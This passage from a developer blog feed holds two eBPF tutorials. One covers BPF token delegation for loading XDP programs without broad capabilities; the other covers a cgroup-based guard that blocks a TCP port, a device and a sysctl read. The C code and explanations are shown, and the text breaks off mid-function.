Forem: 云微

eBPF Tutorial by Example: BPF Token for Delegated Privilege and Secure Program Loading

云微 — Tue, 17 Mar 2026 07:48:37 +0000

Ever needed to let a container or CI job load an eBPF program without giving it full CAP_BPF or CAP_SYS_ADMIN? Or wanted to expose XDP packet processing to a tenant workload while ensuring it can only create the specific map types and program types you've approved? Before BPF token, the answer was binary: either you had the capabilities to do everything in BPF, or you could do nothing. There was no middle ground.

This is what BPF Token solves. Introduced by Andrii Nakryiko and merged in Linux 6.9, BPF token is a delegation mechanism that lets a privileged process (like a container runtime or systemd) create a precisely scoped permission set for BPF operations, then hand it to an unprivileged process through a bpffs mount. The unprivileged process can load programs, create maps, and attach hooks, but only the types that were explicitly allowed. No broad capabilities required.

In this tutorial, we'll set up a delegated bpffs mount in a user namespace, derive a BPF token from it, and use libbpf to load and attach a minimal XDP program, all from a process that has zero BPF capabilities of its own.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_token

Introduction to BPF Token: Solving the Privilege Problem

The Problem: All-or-Nothing BPF Capabilities

Traditional eBPF requires CAP_BPF for program loading and map creation, plus additional capabilities like CAP_PERFMON for tracing, CAP_NET_ADMIN for networking hooks, and CAP_SYS_ADMIN for certain advanced operations. These capabilities are inherently system-wide: you cannot namespace or sandbox CAP_BPF. As the kernel documentation explains, this is by design: BPF tracing helpers like bpf_probe_read_kernel() can access arbitrary kernel memory, which fundamentally cannot be scoped to a single namespace.

This creates a real problem in multi-tenant environments:

Container isolation: A Kubernetes pod that needs to run a simple XDP program must be given CAP_BPF + CAP_NET_ADMIN, which also grants it the ability to load any BPF program type and create any map type. There's no way to say "you can load XDP programs but not kprobes."
CI/CD pipelines: A build job that tests an eBPF-based observability tool needs root-equivalent capabilities to load programs, even though the test only exercises a specific, well-known program type.
Third-party integrations: A service mesh sidecar that attaches sockops programs needs capabilities that also grant it the ability to trace every process on the host.

The result is that organizations either give broad BPF capabilities (weakening their security posture) or prohibit BPF entirely in unprivileged contexts (limiting the technology's adoption).

The Solution: Scoped Delegation Through bpffs

BPF token takes a different approach. Instead of trying to namespace capabilities (which is fundamentally unsafe for BPF), it introduces an explicit delegation model:

A privileged process (container runtime, init system, platform daemon) creates a bpffs instance with specific delegation options that define exactly which BPF operations are allowed.
The privileged process passes this bpffs mount to an unprivileged process (container, CI job, tenant workload).
The unprivileged process derives a BPF token from the bpffs mount. The token is a file descriptor that carries the delegated permission set.
When the unprivileged process makes bpf() syscalls (through libbpf or directly), it passes the token fd. The kernel checks permissions against the token instead of against the process's capabilities.

The token is scoped along four independent axes:

Delegation Option	What It Controls	Example
`delegate_cmds`	Which `bpf()` commands are allowed	`prog_load:map_create:btf_load:link_create`
`delegate_maps`	Which map types can be created	`array:hash:ringbuf`
`delegate_progs`	Which program types can be loaded	`xdp:socket_filter`
`delegate_attachs`	Which attach types are allowed	`xdp:cgroup_inet_ingress` or `any`

Each axis is a bitmask. If a bit isn't set, the corresponding operation is denied even if the token is present. This gives platform engineers fine-grained control: you can allow a container to load XDP programs with array maps but deny it access to kprobes, perf events, or hash-of-maps.
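To make the bitmask idea concrete, here is a small user-space model of one axis. It is only a sketch, not the kernel's option parser: the `demo_` names and the bit positions are hypothetical and chosen for illustration. It turns a colon-separated list such as `array:ringbuf` into a mask and then checks whether a given type is allowed.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical bit positions for this sketch only; the kernel indexes its
 * masks by the numeric values of its own enums. */
enum demo_map_type { DEMO_MAP_HASH = 1, DEMO_MAP_ARRAY = 2, DEMO_MAP_RINGBUF = 3 };

struct demo_name { const char *name; int bit; };

static const struct demo_name demo_map_names[] = {
    { "hash",    DEMO_MAP_HASH },
    { "array",   DEMO_MAP_ARRAY },
    { "ringbuf", DEMO_MAP_RINGBUF },
};

/* Parse a colon-separated list into a bitmask. "any" sets every bit.
 * Returns 0 on success, -1 if a name is not in the table. */
static int demo_parse_delegation(const char *spec, uint64_t *mask)
{
    const size_t n = sizeof(demo_map_names) / sizeof(demo_map_names[0]);
    const char *p = spec;

    *mask = 0;
    if (strcmp(spec, "any") == 0) {
        *mask = ~(uint64_t)0;
        return 0;
    }
    while (*p) {
        size_t len = strcspn(p, ":"); /* length of the current name */
        size_t i;
        int found = 0;

        for (i = 0; i < n; i++) {
            if (strlen(demo_map_names[i].name) == len &&
                strncmp(p, demo_map_names[i].name, len) == 0) {
                *mask |= (uint64_t)1 << demo_map_names[i].bit;
                found = 1;
                break;
            }
        }
        if (!found)
            return -1;
        p += len;
        if (*p == ':')
            p++; /* skip the separator */
    }
    return 0;
}

/* An operation is allowed only if its bit is set in the mask. */
static int demo_mask_allows(uint64_t mask, int bit)
{
    return (int)((mask >> bit) & 1);
}
```

With the mask built from `array:ringbuf`, `demo_mask_allows(mask, DEMO_MAP_HASH)` is 0, which mirrors how a hash map creation would be denied under that policy.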

The User Namespace Constraint

One critical design decision: a BPF token must be created inside the same user namespace as the bpffs instance, and that user namespace must not be init_user_ns. This is intentional. It means:

A host-namespace bpffs (the one at /sys/fs/bpf) does not produce usable tokens. Tokens only work when the bpffs is associated with a non-init user namespace.
The privileged parent configures the bpffs before passing it to the child, but the child (in its own user namespace) is the one that creates and uses the token.
This design prevents a process with an existing token from using it to escalate privileges outside its namespace boundary.

How libbpf Makes It Transparent

For applications built with libbpf (which is most of them), token usage is nearly transparent. You have three options:

Explicit path: Set bpf_object_open_opts.bpf_token_path when opening the BPF object. libbpf will derive the token from the specified bpffs mount.
Environment variable: Set LIBBPF_BPF_TOKEN_PATH to point to the bpffs mount. libbpf picks it up automatically.
Default path: If the default /sys/fs/bpf is a delegated bpffs in the current user namespace, libbpf uses it implicitly.

Once the token is derived, libbpf passes it to every relevant syscall (BPF_MAP_CREATE, BPF_BTF_LOAD, BPF_PROG_LOAD, and BPF_LINK_CREATE) without any source-code changes in the BPF application.
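The three options can be pictured as a simple lookup order. The helper below is a simplified model, assuming the precedence follows the list above (explicit option, then environment variable, then default mount). `demo_resolve_token_path` is a hypothetical name and is not part of libbpf; libbpf does this internally.

```c
#include <stdlib.h>

#define DEMO_DEFAULT_BPFFS "/sys/fs/bpf"

/* Model of the lookup order: explicit path, then LIBBPF_BPF_TOKEN_PATH,
 * then the default bpffs mount point. Only NULL counts as "not set". */
static const char *demo_resolve_token_path(const char *explicit_path)
{
    const char *env;

    if (explicit_path)
        return explicit_path;

    env = getenv("LIBBPF_BPF_TOKEN_PATH");
    if (env)
        return env;

    return DEMO_DEFAULT_BPFFS;
}
```

In this tutorial's loader the first branch is the one that matters, because token_trace always passes the path given with -t.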

Writing the eBPF Program

The BPF side of this demo is intentionally minimal: a tiny XDP program on loopback. This keeps the focus on the token workflow. Here's the complete source:

// SPDX-License-Identifier: GPL-2.0
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>

char LICENSE[] SEC("license") = "GPL";

struct token_stats {
    __u64 packets;
    __u32 last_ifindex;
};

struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, 1);
    __type(key, __u32);
    __type(value, struct token_stats);
} stats_map SEC(".maps");

SEC("xdp")
int handle_packet(struct xdp_md *ctx)
{
    struct token_stats *stats;
    __u32 key = 0;

    stats = bpf_map_lookup_elem(&stats_map, &key);
    if (!stats)
        return XDP_PASS; /* 0 would be XDP_ABORTED, which drops the packet */

    stats->packets++;
    stats->last_ifindex = ctx->ingress_ifindex;
    return XDP_PASS;
}

A few design choices to note:

BPF_MAP_TYPE_ARRAY was chosen because the delegation policy explicitly allows array maps. If we had used a hash map instead, loading would fail because the token doesn't grant hash map creation permission. This is the token model in action; even trivial program changes can be caught by the delegation policy.

SEC("xdp") matches the delegate_progs=xdp policy. If you changed this to SEC("kprobe/..."), the kernel would reject it at load time with an EPERM because kprobe isn't in the allowed program types.

XDP_PASS simply lets every packet through. The program's only purpose is to prove that a token-backed load and attach succeeded. In production, you'd replace this with real packet-processing logic.

User-Space Loader: Token-Backed Loading

The token_trace.c loader is a standard libbpf skeleton program with one key addition: it passes a bpf_token_path:

struct bpf_object_open_opts open_opts = {};

open_opts.sz = sizeof(open_opts);
open_opts.bpf_token_path = env.token_path;

skel = token_trace_bpf__open_opts(&open_opts);

From this point on, libbpf takes over. When it calls bpf(BPF_MAP_CREATE) to create stats_map, it includes the token fd. When it calls bpf(BPF_PROG_LOAD) for the XDP program, it includes the token fd. When it calls bpf(BPF_LINK_CREATE) to attach to the interface, it includes the token fd.

The rest of the loader is straightforward:

err = token_trace_bpf__load(skel);    // token used for map_create + prog_load
link = bpf_program__attach_xdp(skel->progs.handle_packet, ifindex);  // token used for link_create

After attaching, the loader reads the map before and after generating a test packet to verify the program executed:

err = bpf_map_lookup_elem(map_fd, &key, &before);
// ... generate UDP packet to 127.0.0.1 ...
err = bpf_map_lookup_elem(map_fd, &key, &after);
printf("delta          : %llu\n", after.packets - before.packets);

If the delta is 1, the XDP program was successfully loaded and attached using only delegated capabilities.

The Namespace Orchestrator: `token_userns_demo`

Because BPF token requires a non-init user namespace, running a bare token_trace -t /sys/fs/bpf on the host won't work. The token_userns_demo.c wrapper automates the complex namespace choreography. Here's the full sequence:

Step 1: Fork and Create Namespaces

parent (root, init_user_ns)          child (unprivileged, new userns)
         │                                        │
         │   fork()                               │
         ├────────────────────────────────────────>│
         │                                        │
         │                            unshare(CLONE_NEWUSER)
         │                            unshare(CLONE_NEWNS | CLONE_NEWNET)

The child creates a new user namespace (where it maps itself to uid/gid 0), a new mount namespace (so bpffs mounts are private), and a new network namespace (so lo is a fresh interface it can attach to).

Step 2: Create bpffs and Configure Delegation

parent (root, init_user_ns)          child (new userns)
         │                                        │
         │                            fs_fd = fsopen("bpf", 0)
         │   <───── send fs_fd via SCM_RIGHTS ────│
         │                                        │
    fsconfig(fs_fd, "delegate_cmds", ...)         │  (waiting for ack)
    fsconfig(fs_fd, "delegate_maps", "array")     │
    fsconfig(fs_fd, "delegate_progs", "xdp:...")  │
    fsconfig(fs_fd, "delegate_attachs", "any")    │
    fsconfig(fs_fd, FSCONFIG_CMD_CREATE)          │
         │                                        │
         │   ───────── send ack ─────────────────>│

The child calls fsopen("bpf", 0) to create a bpffs filesystem context in its user namespace, then sends the file descriptor to the parent via a Unix socket (SCM_RIGHTS). The parent, running as root in the init namespace, configures the delegation policy with fsconfig(), then materializes the filesystem with FSCONFIG_CMD_CREATE.

This two-step dance is necessary because: (a) the bpffs must be created in the child's user namespace (for the token to be valid there), but (b) only the privileged parent can set delegation options (because those options grant BPF capabilities).
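The fd hand-off in this step relies on SCM_RIGHTS ancillary data. The sketch below shows the general technique with two hypothetical helpers, `demo_send_fd` and `demo_recv_fd`. It is not copied from token_userns_demo.c, which may structure this differently.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/* Send one file descriptor over a connected Unix socket. Returns 0 or -1. */
static int demo_send_fd(int sock, int fd)
{
    char dummy = 'x'; /* one byte of payload travels with the fd */
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align; /* forces correct alignment of buf */
    } ctrl;
    struct msghdr msg;
    struct cmsghdr *cmsg;

    memset(&ctrl, 0, sizeof(ctrl));
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof(ctrl.buf);

    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));

    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one file descriptor. Returns the new fd, or -1 on failure. */
static int demo_recv_fd(int sock)
{
    char dummy;
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } ctrl;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    int fd = -1;

    memset(&ctrl, 0, sizeof(ctrl));
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof(ctrl.buf);

    if (recvmsg(sock, &msg, 0) <= 0)
        return -1;

    cmsg = CMSG_FIRSTHDR(&msg);
    if (!cmsg || cmsg->cmsg_level != SOL_SOCKET || cmsg->cmsg_type != SCM_RIGHTS)
        return -1;

    memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
    return fd;
}
```

The receiver gets a new descriptor number that refers to the same open file. That is why the parent can call fsconfig() on a filesystem context the child created.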

Step 3: Mount and Load

child (new userns)
         │
    mnt_fd = fsmount(fs_fd, 0, 0)
    token_path = "/proc/self/fd/<mnt_fd>"
    set_loopback_up()
    exec("./token_trace", "-t", token_path, "-i", "lo")

The child materializes the bpffs as a detached mount (no mount point needed, since /proc/self/fd/<mnt_fd> gives a path), brings the loopback interface up in its network namespace, and execs token_trace with the bpffs path. From token_trace's perspective, it's just opening a BPF object with a token path. It doesn't know or care about the namespace setup.
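Building the token path from the mount fd is a one-liner, shown here as a sketch with a hypothetical helper `demo_fd_path`. The path is only useful after exec if the fd is still open in the new program, so the descriptor must not carry the close-on-exec flag.

```c
#include <stddef.h>
#include <stdio.h>

/* Format the /proc path that names an open file descriptor.
 * Returns 0 on success, -1 if the buffer is too small. */
static int demo_fd_path(int fd, char *buf, size_t len)
{
    int n = snprintf(buf, len, "/proc/self/fd/%d", fd);

    return (n < 0 || (size_t)n >= len) ? -1 : 0;
}
```

For a mount fd of 5 this yields /proc/self/fd/5, which matches the token path printed in the demo's expected output.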

Preparing a bpffs Mount Manually

If you want to experiment with the mount syntax outside the demo wrapper, the repository includes a helper script:

cd bpf-developer-tutorial/src/features/bpf_token
bash setup_token_bpffs.sh /tmp/bpf-token

This mounts bpffs at /tmp/bpf-token with:

delegate_cmds=prog_load:map_create:btf_load:link_create
delegate_maps=array
delegate_progs=xdp:socket_filter
delegate_attachs=any

Why socket_filter? libbpf performs a trivial program-load probe before loading the real BPF object. This probe uses a generic BPF_PROG_TYPE_SOCKET_FILTER program to detect kernel feature support. Without socket_filter in the delegation policy, the probe fails and libbpf refuses to proceed.

Why delegate_attachs=any? The same libbpf probe path also triggers attach-type validation in the kernel's token checking code. Using any avoids having to enumerate every possible attach type for probe compatibility.

Note that a host-namespace mount like this is useful for inspecting the delegation policy (e.g., with bpftool token list), but won't produce working tokens unless the bpf(BPF_TOKEN_CREATE) syscall comes from a matching non-init user namespace.

Compilation and Execution

Build all binaries:

cd bpf-developer-tutorial/src/features/bpf_token
make

Run the end-to-end demo:

sudo ./token_userns_demo

Expected output:

token path     : /proc/self/fd/5
interface      : lo (ifindex=1)
packets before : 0
packets after  : 1
delta          : 1
last ifindex   : 1

The delta: 1 confirms that the XDP program was successfully loaded and attached using a BPF token, with the child process holding no CAP_BPF or CAP_SYS_ADMIN in the initial user namespace.

Add -v for verbose libbpf output to see the token being created and used:

sudo ./token_userns_demo -v

If you already manage your own delegated bpffs in a user namespace, you can run the loader directly:

./token_trace -t /proc/self/fd/<mnt-fd> -i lo

Real-World Applications

While this tutorial uses a minimal XDP program, the BPF token pattern scales to production scenarios:

Container runtimes (LXD, Docker, Kubernetes): Mount a delegated bpffs into a container with only the program and map types the workload needs. LXD already supports this through its security.delegate_bpf option.
CI/CD testing: Give build jobs the ability to load and test specific eBPF programs without granting them host-level capabilities. The delegation policy acts as an allowlist for BPF operations.
Multi-tenant BPF platforms: A platform daemon creates per-tenant bpffs mounts with different delegation policies. One tenant might be allowed XDP + array maps, while another might get tracepoint + ringbuf access.
LSM integration: Because BPF tokens integrate with Linux Security Modules, you can combine token delegation with SELinux or AppArmor policies for defense-in-depth. Each token gets its own security context that LSM hooks can inspect.

Summary

In this tutorial, we learned how BPF token provides a delegation model for eBPF privilege that goes beyond the binary "all or nothing" of Linux capabilities. We walked through the complete flow: a privileged parent configures a bpffs instance with specific delegation options, an unprivileged child in a user namespace derives a token from that bpffs, and libbpf transparently uses the token for map creation, program loading, and attachment. The result is a minimal XDP program running in an unprivileged context, something that was impossible before Linux 6.9.

BPF token is not a niche feature. It represents the kernel's answer to a fundamental question in the eBPF ecosystem: how do you safely share BPF capabilities in a multi-tenant world without granting unconstrained access to the BPF subsystem?

If you'd like to learn more about eBPF, visit our tutorial code repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or website https://eunomia.dev/tutorials/ for more examples and complete tutorials.


eBPF Tutorial: cgroup-based Policy Control

云微 — Tue, 24 Feb 2026 07:43:56 +0000

Do you need to enforce network access control on containers or specific process groups without affecting the entire system? Or do you need to restrict certain processes from accessing specific devices while allowing others to use them normally? Traditional iptables and device permissions are global, making fine-grained per-process-group control impossible.

This is the problem cgroup eBPF solves. By attaching eBPF programs to cgroups (control groups), you can implement policy control based on process membership—only processes belonging to a specific cgroup are affected. This enables container isolation, multi-tenant security, and sandbox environments. In this tutorial, we'll build a complete "policy guard" program that demonstrates TCP connection filtering, device access control, and sysctl read restrictions—three types of cgroup eBPF usage.

What is cgroup eBPF?

The core idea of cgroup eBPF is simple: attach an eBPF program to a cgroup, and all processes in that cgroup will be controlled by this program. Unlike XDP/tc which filter traffic by network interface, cgroup eBPF filters by process membership—put a container in a cgroup, attach a policy program, and that container's network access, device access, and sysctl reads/writes are all under your control. Processes in other cgroups are completely unaffected.

This model fits container and multi-tenant scenarios well. Kubernetes networking plugins such as Cilium use cgroup eBPF hooks under the hood for socket-level handling. You can also use it for device isolation (e.g., restricting which containers can access GPUs), security sandboxes (preventing reads of sensitive sysctls), and more. When a cgroup eBPF program denies an operation, the corresponding syscall fails in userspace with EPERM (Operation not permitted).

cgroup eBPF Hook Points

1. `BPF_PROG_TYPE_CGROUP_SOCK_ADDR` - Socket Address Hooks

Triggered on socket address syscalls (bind/connect/sendmsg/recvmsg):

Hook	Section Name	Description
IPv4 bind	`cgroup/bind4`	Filter bind() calls
IPv6 bind	`cgroup/bind6`	Filter bind() calls
IPv4 connect	`cgroup/connect4`	Filter connect() calls
IPv6 connect	`cgroup/connect6`	Filter connect() calls
UDP sendmsg	`cgroup/sendmsg4`, `cgroup/sendmsg6`	Filter UDP sends
UDP recvmsg	`cgroup/recvmsg4`, `cgroup/recvmsg6`	Filter UDP receives
Unix connect	`cgroup/connect_unix`	Filter Unix socket connect

Context: struct bpf_sock_addr - contains user_ip4, user_port (network byte order)

Return semantics: return 1 = allow, return 0 = deny (EPERM)

2. `BPF_PROG_TYPE_CGROUP_DEVICE` - Device Access Control

Hook	Section Name	Description
Device access	`cgroup/dev`	Filter device open/read/write/mknod

Context: struct bpf_cgroup_dev_ctx - contains major, minor, access_type

Return semantics: return 0 = deny (EPERM), non-zero = allow
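The access_type field packs two things into one value: the access bits in the upper 16 bits and the device kind in the lower 16 bits. Here is a sketch of a userspace decoder. The `DEMO_` constants are local copies of the BPF_DEVCG_* values from <linux/bpf.h> so that the snippet compiles on its own, and `demo_describe_access` is a hypothetical helper name.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Local copies of the UAPI BPF_DEVCG_* constants */
#define DEMO_DEVCG_ACC_MKNOD (1u << 0)
#define DEMO_DEVCG_ACC_READ  (1u << 1)
#define DEMO_DEVCG_ACC_WRITE (1u << 2)
#define DEMO_DEVCG_DEV_BLOCK (1u << 0)
#define DEMO_DEVCG_DEV_CHAR  (1u << 1)

/* Render access_type as text such as "char rw-" (read, write, mknod). */
static void demo_describe_access(uint32_t access_type, char *buf, size_t len)
{
    uint32_t dev = access_type & 0xffff; /* device kind: low 16 bits */
    uint32_t acc = access_type >> 16;    /* access bits: high 16 bits */
    const char *kind = "unknown";

    if (dev == DEMO_DEVCG_DEV_CHAR)
        kind = "char";
    else if (dev == DEMO_DEVCG_DEV_BLOCK)
        kind = "block";

    snprintf(buf, len, "%s %c%c%c", kind,
             (acc & DEMO_DEVCG_ACC_READ)  ? 'r' : '-',
             (acc & DEMO_DEVCG_ACC_WRITE) ? 'w' : '-',
             (acc & DEMO_DEVCG_ACC_MKNOD) ? 'm' : '-');
}
```

A decoder like this could replace the raw hexadecimal access_type in a loader's log output.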

3. `BPF_PROG_TYPE_CGROUP_SYSCTL` - Sysctl Access Control

Hook	Section Name	Description
Sysctl access	`cgroup/sysctl`	Filter /proc/sys reads/writes

Context: struct bpf_sysctl - use bpf_sysctl_get_name() to get sysctl name

Return semantics: return 0 = reject (EPERM), return 1 = proceed

4. Other cgroup Hooks

cgroup_skb/ingress, cgroup_skb/egress - Packet-level filtering
cgroup/getsockopt, cgroup/setsockopt - Socket option filtering
cgroup/sock_create, cgroup/sock_release - Socket lifecycle
sockops - TCP-level optimization (attached via BPF_CGROUP_SOCK_OPS)

This Tutorial: cgroup Policy Guard

We implement a single eBPF object with three programs:

Network (TCP): Block connect() to a specified destination port
Device: Block access to a specified major:minor device
Sysctl: Block reading a specified sysctl (read-only, safer for testing)

Events are sent to userspace via ringbuf for observability.

Implementation

Shared Header: cgroup_guard.h

This header defines data structures shared between kernel and userspace:

// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
#ifndef __CGROUP_GUARD_H
#define __CGROUP_GUARD_H

#ifndef TASK_COMM_LEN
#define TASK_COMM_LEN 16
#endif

#define SYSCTL_NAME_LEN 64

enum event_type {
    EVENT_CONNECT4 = 1,
    EVENT_DEVICE   = 2,
    EVENT_SYSCTL   = 3,
};

struct event {
    __u64 ts_ns;
    __u32 pid;
    __u32 type;
    char comm[TASK_COMM_LEN];

    union {
        struct {
            __u32 daddr;  /* IPv4, network order */
            __u16 dport;  /* host order */
            __u16 proto;  /* e.g. 6 for TCP */
        } connect4;

        struct {
            __u32 major;
            __u32 minor;
            __u32 access_type;
        } device;

        struct {
            __u32 write;
            char name[SYSCTL_NAME_LEN];
        } sysctl;
    };
};

#endif /* __CGROUP_GUARD_H */

The event structure uses a union to store type-specific data for different events, saving space while maintaining a unified event format.
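To see what the union buys us, the sketch below compares the tutorial's layout with a hypothetical flat layout that stores every payload side by side. The `demo_` types are stand-ins that use <stdint.h> types instead of the kernel's __u32 and friends. Exact sizes depend on the ABI, so the code only computes the difference.

```c
#include <stddef.h>
#include <stdint.h>

#define DEMO_NAME_LEN 64

struct demo_connect4 { uint32_t daddr; uint16_t dport; uint16_t proto; };
struct demo_device   { uint32_t dev_major; uint32_t dev_minor; uint32_t access_type; };
struct demo_sysctl   { uint32_t write; char name[DEMO_NAME_LEN]; };

/* Layout used in the tutorial: one payload slot shared by all event types */
struct demo_event_union {
    uint64_t ts_ns;
    uint32_t pid;
    uint32_t type; /* tells the reader which union member is valid */
    char comm[16];
    union {
        struct demo_connect4 connect4;
        struct demo_device device;
        struct demo_sysctl sysctl;
    };
};

/* Hypothetical alternative: every payload gets its own slot */
struct demo_event_flat {
    uint64_t ts_ns;
    uint32_t pid;
    uint32_t type;
    char comm[16];
    struct demo_connect4 connect4;
    struct demo_device device;
    struct demo_sysctl sysctl;
};

/* Bytes saved per event by sharing the payload slot */
static size_t demo_bytes_saved(void)
{
    return sizeof(struct demo_event_flat) - sizeof(struct demo_event_union);
}
```

The trade-off is that a reader must check type before touching the payload, because only one union member holds valid data for a given event.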

eBPF Program: cgroup_guard.bpf.c

// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
/* cgroup_guard.bpf.c - cgroup eBPF policy guard
 *
 * This program demonstrates three types of cgroup eBPF hooks:
 * 1. cgroup/connect4 - TCP connection filtering
 * 2. cgroup/dev - Device access control
 * 3. cgroup/sysctl - Sysctl read/write control
 */
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>

#include "cgroup_guard.h"

char LICENSE[] SEC("license") = "Dual BSD/GPL";

/* ===== Configurable options: set by userspace before load ===== */
#define IPPROTO_TCP 6

const volatile __u16 blocked_tcp_dport = 0;                   /* host order */
const volatile __u32 blocked_dev_major = 0;
const volatile __u32 blocked_dev_minor = 0;
const volatile char denied_sysctl_name[SYSCTL_NAME_LEN] = {}; /* NUL-terminated */

/* ===== ringbuf: send denied events to userspace ===== */
struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 << 24); /* 16MB */
} events SEC(".maps");

static __always_inline void fill_common(struct event *e, __u32 type)
{
    e->ts_ns = bpf_ktime_get_ns();
    e->type = type;
    e->pid = (__u32)(bpf_get_current_pid_tgid() >> 32);
    bpf_get_current_comm(&e->comm, sizeof(e->comm));
}

/* Compare two strings, return 1 if equal, 0 if not
 * Note: b is volatile to handle const volatile rodata arrays correctly */
static __always_inline int str_eq(const char *a, const volatile char *b, int max_len)
{
#pragma unroll
    for (int i = 0; i < SYSCTL_NAME_LEN; i++) {
        char ca = a[i];
        char cb = b[i];
        if (ca != cb)
            return 0;
        if (ca == '\0')
            return 1;
    }
    return 1;
}

/* ===== 1) Network: block TCP connect4 to specified port =====
 * ctx: struct bpf_sock_addr
 * user_ip4/user_port: network byte order (need conversion)
 *
 * Return semantics:
 * - return 1: allow
 * - return 0: deny (userspace gets EPERM)
 */
SEC("cgroup/connect4")
int cg_connect4(struct bpf_sock_addr *ctx)
{
    if (blocked_tcp_dport == 0)
        return 1;

    if (ctx->protocol != IPPROTO_TCP)
        return 1;

    __u16 dport = bpf_ntohs((__u16)ctx->user_port);
    if (dport != blocked_tcp_dport)
        return 1;

    struct event *e = bpf_ringbuf_reserve(&events, sizeof(*e), 0);
    if (e) {
        fill_common(e, EVENT_CONNECT4);
        e->connect4.daddr = ctx->user_ip4; /* network order */
        e->connect4.dport = dport;         /* host order */
        e->connect4.proto = ctx->protocol;
        bpf_ringbuf_submit(e, 0);
    }

    return 0; /* deny -> userspace gets EPERM on connect */
}

/* ===== 2) Device: block access to specified major:minor =====
 * ctx: struct bpf_cgroup_dev_ctx { access_type, major, minor }
 *
 * Return semantics:
 * - return 0: deny (userspace gets EPERM)
 * - return non-zero: allow
 */
SEC("cgroup/dev")
int cg_dev(struct bpf_cgroup_dev_ctx *ctx)
{
    if (blocked_dev_major == 0 && blocked_dev_minor == 0)
        return 1;

    if (ctx->major != blocked_dev_major || ctx->minor != blocked_dev_minor)
        return 1;

    struct event *e = bpf_ringbuf_reserve(&events, sizeof(*e), 0);
    if (e) {
        fill_common(e, EVENT_DEVICE);
        e->device.major = ctx->major;
        e->device.minor = ctx->minor;
        e->device.access_type = ctx->access_type;
        bpf_ringbuf_submit(e, 0);
    }

    return 0; /* deny -> -EPERM */
}

/* ===== 3) Sysctl: block reading specified sysctl =====
 * ctx: struct bpf_sysctl
 * Use bpf_sysctl_get_name() to get name
 *
 * Return semantics:
 * - return 0: reject
 * - return 1: proceed
 * If return 0, userspace read/write returns -1 with errno=EPERM
 */
SEC("cgroup/sysctl")
int cg_sysctl(struct bpf_sysctl *ctx)
{
    char name[SYSCTL_NAME_LEN];
    int ret = bpf_sysctl_get_name(ctx, name, sizeof(name), 0);
    if (ret < 0)
        return 1;

    if (denied_sysctl_name[0] == '\0')
        return 1;

    /* Only deny reads, allow writes (safer for testing) */
    if (ctx->write)
        return 1;

    if (!str_eq(name, denied_sysctl_name, SYSCTL_NAME_LEN))
        return 1;

    struct event *e = bpf_ringbuf_reserve(&events, sizeof(*e), 0);
    if (e) {
        fill_common(e, EVENT_SYSCTL);
        e->sysctl.write = ctx->write;
#pragma unroll
        for (int i = 0; i < SYSCTL_NAME_LEN; i++) {
            e->sysctl.name[i] = name[i];
            if (name[i] == '\0')
                break;
        }
        bpf_ringbuf_submit(e, 0);
    }

    return 0; /* deny -> -EPERM */
}

Understanding the BPF Code

The overall logic of this program is clear: three cgroup hooks handle network connections, device access, and sysctl reads/writes respectively. Each hook follows the same workflow—check if the current operation matches the configured blocking rule, report an event via ringbuf and return 0 (deny) if it matches, otherwise return 1 (allow).

The cg_connect4 function uses SEC("cgroup/connect4") to attach at IPv4 connection time. There's an important detail here: ctx->user_port is in network byte order (big-endian), while our configured port is in host byte order, so we must convert with bpf_ntohs() before comparing. If the destination port matches our configured blocked_tcp_dport, the program returns 0, and the userspace connect() call fails with EPERM.
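The same comparison can be tried in plain userspace C. This is a sketch with a hypothetical helper `demo_port_blocked`, using ntohs() from <arpa/inet.h> in place of bpf_ntohs().

```c
#include <arpa/inet.h>
#include <stdint.h>

/* user_port_be: the port as the hook sees it, in network byte order.
 * blocked_host_order: the configured port in host byte order (0 = disabled).
 * Returns 1 if the connection should be blocked, 0 otherwise. */
static int demo_port_blocked(uint32_t user_port_be, uint16_t blocked_host_order)
{
    uint16_t dport = ntohs((uint16_t)user_port_be);

    if (blocked_host_order == 0)
        return 0;
    return dport == blocked_host_order;
}
```

On a little-endian machine, skipping the conversion would compare 9090 against the byte-swapped value, and the rule would silently never match.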

The cg_dev function handles device access. Its context struct bpf_cgroup_dev_ctx contains three key fields: major and minor identify the device (e.g., /dev/null is 1:3), and access_type indicates the access type (read/write/mknod). We simply compare whether major:minor matches the configured values.
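If you are unsure which major:minor pair a device node uses, stat() can tell you. The sketch below uses a hypothetical helper `demo_dev_numbers` and assumes a Linux libc that provides major() and minor() in <sys/sysmacros.h>.

```c
#include <sys/stat.h>
#include <sys/sysmacros.h>
#include <sys/types.h>

/* Look up the device numbers of a character or block device node.
 * Returns 0 on success, -1 if the path is missing or not a device. */
static int demo_dev_numbers(const char *path, unsigned int *maj, unsigned int *min)
{
    struct stat st;

    if (stat(path, &st) != 0)
        return -1;
    if (!S_ISCHR(st.st_mode) && !S_ISBLK(st.st_mode))
        return -1;

    *maj = major(st.st_rdev);
    *min = minor(st.st_rdev);
    return 0;
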